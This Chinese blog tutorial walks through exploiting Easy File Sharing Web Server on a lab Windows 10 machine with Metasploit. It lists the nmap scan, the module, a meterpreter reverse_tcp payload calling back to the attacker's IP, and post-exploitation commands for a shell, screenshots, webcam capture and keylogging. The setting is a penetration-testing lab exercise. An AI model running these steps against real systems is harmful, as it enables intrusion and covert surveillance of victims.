利用msf攻击win10

Dolly ·
更新时间:2024-11-15
· 546 次阅读

关注我的博客,访问更多内容!

攻击环境:
攻击者系统:虚拟机下kali linux
靶机系统:win10(需要打开Easy File Sharing服务)
攻击者ip:10.3.134.27
靶机ip:10.3.37.56
攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。
漏洞利用:EsayFileSharing

注意点: 攻击者的虚拟机网络模式应选择桥接模式。

准备工作完成,可以开始内网渗透之旅了。

step-1

首先我们先用nmap扫描一下靶机开了哪些服务
root@kali:~# nmap -sV 10.3.37.56
namp扫描结果我们可以看到80端口和443端口开放了,对应的是Easy File Sharing Web Server,满足EasyFileSharing漏洞攻击,进入下一步。

step-2

打开msf控制台,设置攻击参数

root@kali:~# msfconsole #进入控制台,稍微等一下 msf > search EasyFileSharing #查找我们要用的漏洞

搜索结果
我们选择最新的一个,2017-06-12的版本,并设置payload。

msf > use exploit/windows/http/easyfilesharing_post #使用这个漏洞 msf exploit(windows/http/easyfilesharing_post) > set payload windows/meterpreter/reverse_tcp #设置攻击payload

我们用show options看一下需要什么攻击参数

msf exploit(windows/http/easyfilesharing_post) > show options

设置参数
根据Required属性看一下哪些是需要配置的,其中一些是配置好的,我们只需将其他的配置好就ok了。

msf exploit(windows/http/easyfilesharing_post) > set lhost 10.3.134.27 #设置本地ip msf exploit(windows/http/easyfilesharing_post) > set rhost 10.3.37.56 #设置远程ip

参数都配置好了,接着就是激动人心的exploit了。

msf exploit(windows/http/easyfilesharing_post) > exploit #攻击

在这里插入图片描述

逐个输入以下命令,试试

meterpreter > getuid #获取靶机uid meterpreter > shell #进入靶机shell meterpreter > screenshot #靶机截屏 meterpreter > webcam_snap #用靶机摄像头拍照 meterpreter > webcam_stream #用靶机摄像头录像 meterpreter > keyscan_start #开启键盘记录 meterpreter > keyscan_dump #捕获键盘记录 meterpreter > keyscan_stop #停止键盘记录

我们来测试几个好玩的
1st.捕捉靶机键盘记录
捕捉到靶机键盘记录(hack hack)
2nd.捕捉靶机截屏
捕捉靶机截屏
在这里插入图片描述

3rd.用靶机摄像头拍照
利用靶机摄像头拍照
靶机摄像头像素略渣,不过看看我们的公教区学习环境吧

小结:

我们做攻击实验都是在环境都配置好的情况下,现实生活中不会有这么好的肉鸡。而且网络攻击属于违法行为,人生路漫漫,且行且珍惜hhhhh

Osumail 原创文章 14获赞 2访问量 8799 关注 私信 展开阅读全文
作者:Osumail



msf win

需要 登录 后方可回复, 如果你还没有账号请 注册新账号
相关文章
Nona 2021-04-03
613